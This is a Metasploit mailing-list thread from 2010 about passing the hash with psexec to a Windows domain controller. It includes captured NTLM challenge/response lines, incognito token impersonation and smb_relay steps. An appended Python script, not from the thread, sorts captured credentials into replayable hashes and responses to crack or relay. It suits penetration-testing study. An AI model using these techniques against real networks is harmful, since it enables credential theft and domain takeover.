Metasploit mailing list archives

Re: PSEXEC - Pass the Hash - Domain Credentials


From: Carlos Perez <carlos_perez () darkoperator com>
Date: Sat, 30 Jan 2010 21:16:55 -0400

Upload the dsadd tool and execute it with the -t option from meterpreter.

http://support.microsoft.com/kb/322684

Sent from my Mobile Phone

On Jan 30, 2010, at 7:28 PM, troy () defendit com au wrote:

Hi All,

Is it possible to "pass the hash" using domain credentials to a DC?

The situation I find myself in: you get SYSTEM or Local Admin privs on a
domain member (server/workstation). You PSEXEC pass the local admin
account hash around to other boxes until you find one that a Domain
Administrator has used recently (using incognito). Impersonating the domain
admin account then gives you domain admin access, so you can map drives and
create domain users (dependent on policy). However, you cannot change the
group membership of domain accounts; this must be done on a DC.
Meterpreter cannot dump cached credentials, so I use smb_relay and get the
impersonated account to map to my smb_relay and capture the challenge
response, which looks like:

pwfile
Administrator:ACME:1122334455667788:8b35f9c3c5dd2e65b50eeac1fa8056e809f3c2c21aa1572f:c3d6d3245736dc5168c89e2dc1c48fd939f964ed1f0faa04

logfile
HOMER:192.168.0.9:<NULL>:<NULL>:Windows 2002 2600:<NULL>:<NULL>:Fri Jan 29 19:14:25 -0500 2010
HOMER:192.168.0.9:Administrator:ACME:Windows 2002 2600:c3d6d3245736dc5168c89e2dc1c48fd939f964ed1f0faa04:8b35f9c3c5dd2e65b50eeac1fa8056e809f3c2c21aa1572f:Fri Jan 29 19:14:25 -0500 2010

Load up smb/psexec and payload meterpreter/bind_tcp
set SMBUser Administrator
set SMBDomain ACME

Attempting the hash above, I get STATUS_LOGON_FAILURE. Even using the
known password I cannot psexec to the DC, but the known password will
work to a member server (still not to the DC).

Could anybody provide their input please?

Thanks in advance.

Regards,
Troy


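The pwfile line above is not an LM:NT hash pair but an NTLMv1 challenge/response: an 8-byte challenge (16 hex characters, here the fixed 1122334455667788 the capture module issues) followed by two 24-byte responses (48 hex characters each). psexec's SMBPass expects the 16-byte LM and NT hashes (32 hex characters each), and a response is bound to the challenge it answered, so feeding it as a hash produces STATUS_LOGON_FAILURE. The script below is an added example, not code from the thread or from Metasploit: it parses either a capture/smb_relay pwfile line or a pwdump-style line, tolerates the stray spaces mail clients insert after colons, classifies what was captured, and reports whether the value can be passed with psexec. Field layouts, the sample lines and the function names are assumptions made for this illustration.

```python
import re
from dataclasses import dataclass
from typing import Optional

_HEX = re.compile(r"^[0-9a-fA-F]+$")

# Field lengths, in hex characters, that distinguish the two artefact types.
NT_HASH_LEN = 32        # 16-byte LM or NT hash (NT = MD4 of the UTF-16LE password)
CHALLENGE_LEN = 16      # 8-byte server challenge
NTLMV1_RESP_LEN = 48    # 24-byte LM / NTLMv1 response (three DES blocks)


@dataclass
class Credential:
    user: str
    domain: str
    kind: str                       # "nt_hash", "ntlmv1", "ntlmv2" or "unknown"
    challenge: Optional[str] = None
    lm: Optional[str] = None
    nt: Optional[str] = None

    def smbpass(self) -> Optional[str]:
        """Value usable as SMBPass for exploit/windows/smb/psexec, or None."""
        if self.kind == "nt_hash":
            return f"{self.lm}:{self.nt}"
        return None

    def diagnosis(self) -> str:
        if self.kind == "nt_hash":
            return "LM:NT hash pair; can be passed directly with psexec"
        if self.kind in ("ntlmv1", "ntlmv2"):
            return (f"{self.kind.upper()} challenge/response to challenge "
                    f"{self.challenge}; bound to that challenge, so it cannot be "
                    "replayed as a hash (psexec returns STATUS_LOGON_FAILURE). "
                    "Crack it or relay it live to get something reusable.")
        return "unrecognised line format"


def _is_hex(s: str, n: Optional[int] = None) -> bool:
    return bool(_HEX.match(s)) and (n is None or len(s) == n)


def parse_line(line: str) -> Credential:
    """Parse one pwfile line (user:domain:challenge:lmresp:ntresp, as written by
    the capture/smb_relay modules) or one pwdump line (user:rid:lmhash:nthash:::).
    Each field is stripped because mail wrapping adds spaces after ':'."""
    f = [x.strip() for x in line.strip().split(":")]
    # pwdump style: two 32-hex fields at positions 2 and 3
    if len(f) >= 4 and _is_hex(f[2], NT_HASH_LEN) and _is_hex(f[3], NT_HASH_LEN):
        return Credential(user=f[0], domain="", kind="nt_hash",
                          lm=f[2].lower(), nt=f[3].lower())
    # capture style: 16-hex challenge followed by the LM and NT responses
    if len(f) == 5 and _is_hex(f[2], CHALLENGE_LEN) and _is_hex(f[3]) and _is_hex(f[4]):
        lm, nt = f[3].lower(), f[4].lower()
        if len(lm) == NTLMV1_RESP_LEN and len(nt) == NTLMV1_RESP_LEN:
            kind = "ntlmv1"
        elif len(nt) > NTLMV1_RESP_LEN:
            kind = "ntlmv2"     # NTLMv2 NT response = 16-byte HMAC + variable blob
        else:
            kind = "unknown"
        return Credential(user=f[0], domain=f[1], kind=kind,
                          challenge=f[2].lower(), lm=lm, nt=nt)
    return Credential(user=f[0] if f else "", domain="", kind="unknown")


# Constructed sample input: the pwfile line from the thread (stray spaces kept)
# and a pwdump-style line built from the well-known empty LM hash and the NT
# hash of the empty password.
SAMPLE_PWFILE = ("Administrator:ACME: 1122334455667788: "
                 "8b35f9c3c5dd2e65b50eeac1fa8056e809f3c2c21aa1572f:"
                 "c3d6d3245736dc5168c89e2dc1c48fd939f964ed1f0faa04")
SAMPLE_PWDUMP = ("Administrator:500:aad3b435b51404eeaad3b435b51404ee:"
                 "31d6cfe0d16ae931b73c59d7e0c089c0:::")

if __name__ == "__main__":
    for line in (SAMPLE_PWFILE, SAMPLE_PWDUMP):
        c = parse_line(line)
        print(f"{c.domain or '-'}\\{c.user}: {c.kind}: {c.diagnosis()}")
        print("  SMBPass =", c.smbpass())
```

Run it against a capture pwfile before trying psexec: anything it reports as ntlmv1 or ntlmv2 has to be cracked (or relayed while the session is live) rather than passed, whereas an nt_hash line can go straight into SMBPass as the LM:NT pair it prints.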
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework